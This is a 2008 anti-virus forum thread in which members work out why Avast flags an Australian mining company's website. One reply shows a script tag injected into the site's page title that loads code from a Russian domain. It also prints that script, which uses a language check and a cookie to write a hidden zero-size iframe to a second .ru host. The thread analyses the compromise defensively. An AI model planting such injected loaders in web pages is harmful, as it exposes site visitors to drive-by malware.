Avast Home Edition Pops up with this site

Discussion in 'other anti-virus software' started by Albinoni, Aug 3, 2008.

Thread Status:
Not open for further replies.
  1. Albinoni

    Albinoni Registered Member

    I went on to this Australian Mining site and everytime I do so Avast pops up and warns me. Not sure what the hell is going on here, but starngely enough it tells me the site is russian, when infact its Australian Mining Site

    This is the website:

    www.polarismetals.com.au
     
  2. doktornotor

    doktornotor Registered Member

    No wonder...

    Code:
    <title>Polaris Metals NL &raquo; Welcome to Polaris Metals NL<script src=http://www.uhwc.ru/js.js></script>
    :rolleyes:
     
  3. Albinoni

    Albinoni Registered Member

    May I ask how did you do that code thing ?

    I did actually go that ru site and its actually a Union Bank and Trust Company and when I went to the site itself strangely Avast did not pop up.
     
  4. doktornotor

    doktornotor Registered Member

    Use something like "View source code" in your browser...

    And here's the js.js script:

    Code:
    window.status="";
    n=navigator.userLanguage.toUpperCase();
    if((n!="ZH-CN")&&(n!="ZH-MO")&&(n!="ZH-HK")&&(n!="BN")&&(n!="GU")&&(n!="NE")&&(n!="PA")&&(n!="ID")&&(n!="EN-PH")&&(n!="UR")&&(n!="RU")&&(n!="KO")&&(n!="ZH-TW")&&(n!="ZH")&&(n!="HI")&&(n!="TH")&&(n!="VI")){
    var cookieString = document.cookie;
    var start = cookieString.indexOf("v1goo=");
    if (start != -1){}else{
    var expires = new Date();
    expires.setTime(expires.getTime()+9*3600*1000);
    document.cookie = "v1goo=update;expires="+expires.toGMTString();
    try{
    document.write("<iframe src=http://ncbw.ru/cgi-bin/index.cgi?ad width=0 height=0 frameborder=0></iframe>");
    }
    catch(e)
    {
    };
    }}
    
    The guys should check their webhosting's security ... :p Asprox domains...
     
  5. Albinoni

    Albinoni Registered Member

    Ok I did work it out by using notepad.
     
  6. emperordarius

    emperordarius Registered Member

    Last edited: Aug 3, 2008
Thread Status:
Not open for further replies.
  1. This site uses cookies to help personalise content, tailor your experience and to keep you logged in if you register.
    By continuing to use this site, you are consenting to our use of cookies.
    Dismiss Notice